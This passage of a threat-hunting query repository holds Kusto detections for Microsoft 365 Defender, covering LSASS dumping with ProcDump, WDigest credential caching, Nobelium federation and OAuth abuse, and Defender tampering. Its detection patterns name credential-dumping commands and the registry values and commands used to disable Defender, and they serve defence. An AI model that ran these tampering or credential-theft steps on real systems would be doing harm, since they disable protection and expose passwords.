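               Host = DeviceName, LogonType, IPAddress = RemoteIP
     | where isnotempty(Key));
maliciousMail
// One join key per form of the recipient: full address for identity logons, local part for device logons
| mv-expand Key = pack_array(Recipient, tostring(split(Recipient, "@")[0])) to typeof(string)
| join kind=inner logons on Key
| where LogonTime between (EmailTime .. (EmailTime + window))
| summarize Logons = count(), FirstLogon = min(LogonTime), Hosts = make_set(Host, 10),
            Sources = make_set(Source), LogonTypes = make_set(LogonType), IPs = make_set(IPAddress, 10)
  by Recipient, NetworkMessageId, Subject, SenderFromAddress, EmailTime
| order by EmailTime desc
```

A recipient whose first post-delivery logon comes from a host or IP they do not normally use is the row to pivot on; `Sources` tells you whether the evidence came from the identity provider, the endpoint, or both.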
## Query

```
//Find logons that occurred right after malicious email was received
let MaliciousEmail=EmailEvents
| where ThreatTypes has_cs "Malware"
| project TimeEmail = Timestamp, Subject, SenderFromAddress, AccountName = tostring(split(RecipientEmailAddress, "@")[0]);
MaliciousEmail
| join (
    IdentityLogonEvents
    | project LogonTime = Timestamp, AccountName, DeviceName
) on AccountName
| where (LogonTime - TimeEmail) between (0min.. 30min)
| take 10
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | Logon attempts after receipt of malicious email can indicate that the account is compromised or being compromised |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Credential Access/procdump-lsass-credentials.md
================================================
# Procdump dumping LSASS credentials

This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild".

In early March 2021, Microsoft released [patches](https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/) for four different zero-day vulnerabilities affecting Microsoft Exchange Server. The vulnerabilities were being used in a coordinated attack.

For more information on the vulnerabilities, visit the following links:

* [CVE-2021-26855](https://nvd.nist.gov/vuln/detail/CVE-2021-26855)
* [CVE-2021-26857](https://nvd.nist.gov/vuln/detail/CVE-2021-26857)
* [CVE-2021-26858](https://nvd.nist.gov/vuln/detail/CVE-2021-26858)
* [CVE-2021-27065](https://nvd.nist.gov/vuln/detail/CVE-2021-27065)

The following query looks for evidence of ProcDump being used to dump the memory of LSASS, the Local Security Authority Subsystem Service, from which credentials can be extracted. This might indicate an attacker has compromised user accounts.

More queries related to this threat can be found under the [See also](#See-also) section of this page.

## Query

```Kusto
DeviceProcessEvents
| where (FileName has_any ("procdump.exe", "procdump64.exe") and ProcessCommandLine has "lsass")
    or
    // Looking for the -accepteula flag or -ma (write a dump file with all process memory)
    (ProcessCommandLine has "lsass.exe" and (ProcessCommandLine has "-accepteula" or ProcessCommandLine contains "-ma"))
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## See also

* [Reverse shell loaded using Nishang Invoke-PowerShellTcpOneLine technique](../Execution/reverse-shell-nishang.md)
* [7-ZIP used by attackers to prepare data for exfiltration](../Exfiltration/7-zip-prep-for-exfiltration.md)
* [Exchange PowerShell snap-in being loaded](../Exfiltration/exchange-powershell-snapin-loaded.md)
* [Powercat exploitation tool downloaded](../Delivery/powercat-download.md)
* [Exchange vulnerability creating web shells via UMWorkerProcess](../Execution/umworkerprocess-creating-webshell.md)
* [Exchange Server IIS dropping web shells and other artifacts](../Execution/exchange-iis-worker-dropping-webshell.md)
* [Exchange vulnerability launching subprocesses through UMWorkerProcess](../Execution/umworkerprocess-unusual-subprocess-activity.md)
* [Base64-encoded Nishang commands for loading reverse shell](../Execution/reverse-shell-nishang-base64.md)

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Credential Access/wadhrama-credential-dump.md
================================================
# Image File Execution Options and .bat file usage in association with Wadhrama ransomware

This query was originally published in the threat analytics report, *RDP ransomware persists as Wadhrama*.

The ransomware known as [Wadhrama](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Wadhrama) has been used in human-operated attacks that follow a particular pattern.
The attackers often use Remote Desktop Protocol (RDP) to gain initial access to a device or network, exfiltrate credentials, and maintain persistence.

The following query checks for possible Wadhrama-related activity by detecting the technique these attackers have used in the past to dump credentials. Other techniques used by the group associated with Wadhrama are listed under [See also](#see-also).

## Query

```Kusto
// Find use of Image File Execution Options (IFEO) in conjunction
// with a .bat file to dump credentials
DeviceRegistryEvents
| where Timestamp > ago(7d)
| where RegistryKey has "sethc" or RegistryKey has "utilman"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Find data destruction related to Wadhrama ransomware](../Impact/wadhrama-data-destruction.md)
* [Find RDP persistence attempts related to Wadhrama ransomware](../Persistence/wadhrama-ransomware.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Credential Access/wdigest-caching.md
================================================
# Credential harvesting through WDigest cache

This query was originally published in the threat analytics report, *WDigest credential harvesting*.

[WDigest](https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc778868(v=ws.10)?redirectedfrom=MSDN) is a legacy authentication protocol dating from Windows XP.
While still used on some corporate networks, WDigest can be abused by attackers: when WDigest credential caching is enabled, LSASS keeps a cleartext copy of logon passwords in memory, which can then be dumped. The Microsoft Security Response Center published an [overview](https://msrc-blog.microsoft.com/2014/06/05/an-overview-of-kb2871997/) of [KB2871997](https://www.catalog.update.microsoft.com/Search.aspx?q=KB2871997), which addresses WDigest use on older platforms. More recent versions of Windows can be protected with a holistic security approach that follows the [principle of least privilege](https://docs.microsoft.com/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models).

The following query returns any attempts to turn WDigest credential caching on through the registry.

## Query

```Kusto
union DeviceRegistryEvents, DeviceProcessEvents
// Find attempts to turn on WDigest credential caching
| where (RegistryKey contains "wdigest"
         and RegistryValueName == "UseLogonCredential"
         and RegistryValueData == "1")
// Find processes created with command lines that attempt to turn on WDigest caching
    or (ProcessCommandLine has "WDigest"
        and ProcessCommandLine has "UseLogonCredential"
        and ProcessCommandLine has "dword"
        and ProcessCommandLine has "1")
| project Timestamp, DeviceName, PreviousRegistryValueData, RegistryKey, RegistryValueName, RegistryValueData, FileName, ProcessCommandLine, InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Defense evasion/ADFSDomainTrustMods[Nobelium].md
================================================
# Domain federation trust settings modified

This query will find when federation trust settings are changed for a domain or when the domain is changed from managed to federated authentication. Results will relate to when a new Active Directory Federation Services (ADFS) TrustedRealm object, such as a signing certificate, is added. Modification to domain federation settings should be rare, so confirm the added or modified target domain/URL is legitimate administrative behavior.

The actor, Nobelium, was observed modifying domain trust settings to subvert existing mechanisms and cause the domain to accept authorization tokens signed with actor-owned certificates. See [*Customer Guidance on Recent Nation-State Cyber Attacks*](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/).

To understand why an authorized user may update settings for a federated domain in Office 365, Azure, or Intune, see [*Update or repair the settings of a federated domain in Office 365, Azure, or Intune*](https://docs.microsoft.com/office365/troubleshoot/active-directory/update-federated-domain-office-365).

For details on security realms that accept security tokens, see the ADFS Proxy Protocol (MS-ADFSPP) specification: [*3.2.5.1.2.4 Security Realm Data*](https://docs.microsoft.com/openspecs/windows_protocols/ms-adfspp/e7b9ea73-1980-4318-96a6-da559486664b).
For further information on AuditLogs, please see [*Azure AD audit activity reference*](https://docs.microsoft.com/azure/active-directory/reports-monitoring/reference-audit-activities).

This query is inspired by an Azure Sentinel [detection](https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml).

## Query

```Kusto
let auditLookback = 1d;
(union isfuzzy=true
    (
    CloudAppEvents
    | where Timestamp > ago(auditLookback)
    | where ActionType =~ "Set federation settings on domain."
    ),
    (
    CloudAppEvents
    | where Timestamp > ago(auditLookback)
    | where ActionType =~ "Set domain authentication."
    | extend modifiedProperties = parse_json(RawEventData).ModifiedProperties
    | mv-expand modifiedProperties
    | extend newDomainValue=tostring(parse_json(modifiedProperties).NewValue)
    | where newDomainValue has "Federated"
    )
)
| extend resultStatus = extractjson("$.ResultStatus", tostring(RawEventData), typeof(string))
| extend targetDisplayName = parse_json(RawEventData).Target[0].ID
| project Timestamp, ActionType, InitiatingUserOrApp=AccountDisplayName, targetDisplayName, resultStatus, InitiatingIPAddress=IPAddress, UserAgent
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | V | T1484.002 |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](./Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](./MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Blake Strom

**GitHub alias:** @bstrom

**Organization:** Microsoft 365 Defender

**Contact info:** blstrom@microsoft.com

================================================
FILE: Defense evasion/Discovering potentially tampered devices [Nobelium].md
================================================
# Discovering potentially tampered devices [Nobelium]

To evade security software and analyst tools, Nobelium malware enumerates the target system looking for certain running processes, loaded drivers, and registry keys, with the goal of disabling them. The Microsoft Defender for Endpoint sensor is one of the processes the malware attempts to disable.

Microsoft Defender for Endpoint has built-in protections against many techniques attackers use to disable endpoint sensors, ranging from hardened OS protection and anti-tampering policies to detections for a variety of tampering attempts, including "Attempt to stop Microsoft Defender for Endpoint sensor", "Tampering with Microsoft Defender for Endpoint sensor settings", and "Possible sensor tampering in memory".

Successfully disabling Microsoft Defender for Endpoint can prevent the system from reporting observed activities. However, the multitude of signals reported into Microsoft 365 Defender provides a unique opportunity to hunt for systems where the tampering technique used might have been successful.
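The tampering alert titles listed above are the first signal; a device that raised one of them and then went quiet is exactly the case this file hunts for. The query below is an added example, not part of this repository, that joins those alerts to the device they fired on and compares the time of the last alert with the device's last `DeviceInfo` report, flagging devices whose last report is not comfortably after their last tampering alert. The 30-day lookback, the one-hour margin, and the use of `DeviceInfo` as the liveness signal are assumptions; the repository's own query that follows uses network and process events for the same purpose and the two are meant to be run side by side.

```kusto
let lookback = 30d;
// Alert titles named on this page for sensor tampering attempts
let tamperTitles = dynamic([
    "Attempt to stop Microsoft Defender for Endpoint sensor",
    "Tampering with Microsoft Defender for Endpoint sensor settings",
    "Possible sensor tampering in memory"]);
// Assumption: the most recent DeviceInfo row is a good enough proxy for "the sensor is still reporting"
let lastSeen = DeviceInfo
| where Timestamp > ago(lookback)
| summarize LastReport = max(Timestamp) by DeviceId;
AlertInfo
| where Timestamp > ago(lookback)
| where Title in~ (tamperTitles)
// AlertInfo carries no device column; the Machine evidence row of the alert does
| join kind=inner (
    AlertEvidence
    | where EntityType == "Machine"
    | project AlertId, DeviceId, DeviceName) on AlertId
| summarize TamperAlerts = count(), FirstAlert = min(Timestamp), LastAlert = max(Timestamp),
            Titles = make_set(Title) by DeviceId, DeviceName
| join kind=leftouter lastSeen on DeviceId
// No report at all, or none later than an hour after the last alert: the attempt may have worked
| extend SilentSinceAlert = isnull(LastReport) or LastReport < LastAlert + 1h
| project DeviceId, DeviceName, TamperAlerts, Titles, FirstAlert, LastAlert, LastReport, SilentSinceAlert
| order by iff(SilentSinceAlert, 1, 0) desc, LastAlert desc
```

Devices with `SilentSinceAlert` true should be checked out of band (EDR console device page, ping, or a remote session) before being treated as tampered, since a laptop that was simply shut down after the alert produces the same pattern.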
The following advanced hunting query can be used to locate devices that should be reporting but aren't:

## Query

```Kusto
// Times to be modified as appropriate
let timeAgo=1d;
let silenceTime=8h;
// Get all silent devices and IPs from network events
let allNetwork=materialize(DeviceNetworkEvents
| where Timestamp > ago(timeAgo) and isnotempty(LocalIP) and isnotempty(RemoteIP)
    and ActionType in ("ConnectionSuccess", "InboundConnectionAccepted")
    and LocalIP !in ("127.0.0.1", "::1")
| project DeviceId, Timestamp, LocalIP, RemoteIP, ReportId);
let nonSilentDevices=allNetwork
| where Timestamp > ago(silenceTime)
| union (DeviceProcessEvents | where Timestamp > ago(silenceTime))
| summarize by DeviceId;
let nonSilentIPs=allNetwork
| where Timestamp > ago(silenceTime)
| summarize by LocalIP;
let silentDevices=allNetwork
| where DeviceId !in (nonSilentDevices) and LocalIP !in (nonSilentIPs)
| project DeviceId, LocalIP, Timestamp, ReportId;
// Get all remote IPs that were recently active
let addressesDuringSilence=allNetwork
| where Timestamp > ago(silenceTime)
| summarize by RemoteIP;
// Potentially disconnected devices were connected but are silent
silentDevices
| where LocalIP in (addressesDuringSilence)
// Keep the latest event per device, with the ReportId and LocalIP from that same event
| summarize arg_max(Timestamp, ReportId, LocalIP) by DeviceId
| project DeviceId, ReportId, Timestamp, LocalIP
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | V | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](./ADFSDomainTrustMods[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](./MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Microsoft 365 Defender

================================================
FILE: Defense evasion/MailPermissionsAddedToApplication[Nobelium].md
================================================
# Mail.Read or Mail.ReadWrite permissions added to OAuth application

This query will find applications that have been granted Mail.Read or Mail.ReadWrite permissions where the same user also consented to the application at about the same time. It can help identify applications that have been abused to gain access to user email.

The actor, Nobelium, was observed modifying existing tenant application permissions to allow them to read user email through the Microsoft Graph API. See [*Customer Guidance on Recent Nation-State Cyber Attacks*](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/).

This query is inspired by an Azure Sentinel [detection](https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/MailPermissionsAddedToApplication.yaml).

## Query

```Kusto
let auditLookback = 1d;
CloudAppEvents
| where Timestamp > ago(auditLookback)
| where ActionType == "Add delegated permission grant."
| extend RawEventData = parse_json(RawEventData)
| where RawEventData.ResultStatus =~ "success"
| extend UserId = tostring(RawEventData.UserId)
// The "User-Agent" key is stripped of its dash so it can be addressed as .UserAgent after parsing
| extend UserAgent = parse_json(replace('-','',tostring(RawEventData.ExtendedProperties[0].Value))).UserAgent
| extend properties = RawEventData.ModifiedProperties
| mv-expand properties
| extend Permissions = properties.NewValue
| where Permissions has_any ("Mail.Read", "Mail.ReadWrite")
| extend PermissionsAddedTo = tostring(RawEventData.Target[3].ID) // Get target of permissions
| project-away properties, RawEventData
| join kind=leftouter (
    CloudAppEvents
    | where Timestamp > ago(auditLookback)
    | where ActionType == "Consent to application."
    | where isnotempty(AccountDisplayName)
    | extend RawEventData = parse_json(RawEventData)
    | extend UserId = tostring(RawEventData.UserId)
    | extend targetInfo = RawEventData.Target
    | extend AppName = tostring(targetInfo[3].ID) // Find app name
    | extend AppId = tostring(targetInfo[4].ID) // Find appId
    | project ConsentTimestamp=Timestamp, UserId, AccountDisplayName, AppName, AppId
) on UserId
// Ensure app consent happened close to the same time as the permissions were granted
| extend ConsentTimestamp = todatetime(format_datetime(ConsentTimestamp, 'MM/dd/yyyy HH:mm'))
| extend PermsTimestamp = todatetime(format_datetime(Timestamp, 'MM/dd/yyyy HH:mm'))
| where PermsTimestamp -2m <= ConsentTimestamp // ensure consent happened near permissions grant
| where PermsTimestamp +2m >= ConsentTimestamp
| project Timestamp, ActionType, InitiatingUser=AccountDisplayName, UserId, InitiatingIP=IPAddress, UserAgent, PermissionsAddedTo, AppName, AppId
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered?
(v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | V | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in 
URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](./ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](./Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Blake Strom **GitHub alias:** @bstrom **Organization:** Microsoft 365 Defender **Contact info:** blstrom@microsoft.com ================================================ FILE: Defense evasion/PotentialMicrosoftDefenderTampering[Solarigate].md ================================================ # 
Potential Microsoft Defender services tampering Identifies potential service tampering related to Microsoft Defender services. Query insprired by Azure Sentinel detection https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/PotentialMicrosoftDefenderTampering.yaml ## Query ``` let includeProc = dynamic(["sc.exe","net1.exe","net.exe", "taskkill.exe", "cmd.exe", "powershell.exe"]); let action = dynamic(["stop","disable", "delete"]); let service1 = dynamic(['sense', 'windefend', 'mssecflt']); let service2 = dynamic(['sense', 'windefend', 'mssecflt', 'healthservice']); let params1 = dynamic(["-DisableRealtimeMonitoring", "-DisableBehaviorMonitoring" ,"-DisableIOAVProtection"]); let params2 = dynamic(["sgrmbroker.exe", "mssense.exe"]); let regparams1 = dynamic(['reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"', 'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Advanced Threat Protection"']); let regparams2 = dynamic(['ForceDefenderPassiveMode', 'DisableAntiSpyware']); let regparams3 = dynamic(['sense', 'windefend']); let regparams4 = dynamic(['demand', 'disabled']); let timeframe = 1d; DeviceProcessEvents | where Timestamp >= ago(timeframe) | where InitiatingProcessFileName in~ (includeProc) | where (InitiatingProcessCommandLine has_any(action) and InitiatingProcessCommandLine has_any (service2) and InitiatingProcessParentFileName != 'cscript.exe') or (InitiatingProcessCommandLine has_any (params1) and InitiatingProcessCommandLine has 'Set-MpPreference' and InitiatingProcessCommandLine has '$true') or (InitiatingProcessCommandLine has_any (params2) and InitiatingProcessCommandLine has "/IM") or (InitiatingProcessCommandLine has_any (regparams1) and InitiatingProcessCommandLine has_any (regparams2) and InitiatingProcessCommandLine has '/d 1') or (InitiatingProcessCommandLine has_any("start") and InitiatingProcessCommandLine has "config" and InitiatingProcessCommandLine has_any (regparams3) and 
